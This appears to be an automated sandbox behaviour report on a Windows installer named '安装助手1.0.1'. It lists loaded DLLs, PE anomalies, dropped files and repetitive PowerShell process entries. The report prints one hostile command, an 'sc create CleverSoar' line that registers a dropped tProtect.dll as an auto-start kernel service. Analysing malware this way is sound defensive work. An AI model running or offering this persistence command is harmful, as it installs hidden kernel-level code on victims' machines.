Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeStatic file information: File size 8595621 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2113537072.0000000001380000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2113433554.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007957D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_007957D0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x3439cd
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeStatic PE information: real checksum: 0x0 should be: 0x838234
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x3439cd
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .8Tk
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9C86EB push ecx; ret 6_2_6C9C86FE
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C870F00 push ss; retn 0001h6_2_6C870F0A
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA96F10 push eax; ret 6_2_6CA96F2E
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9FB9F4 push 004AC35Ch; ret 6_2_6C9FBA0E
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA97290 push eax; ret 6_2_6CA972BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007145F4 push 007BC35Ch; ret 10_2_0071460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AFB10 push eax; ret 10_2_007AFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007AFE90 push eax; ret 10_2_007AFEBE
Source: update.vac.2.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.6.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.6.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
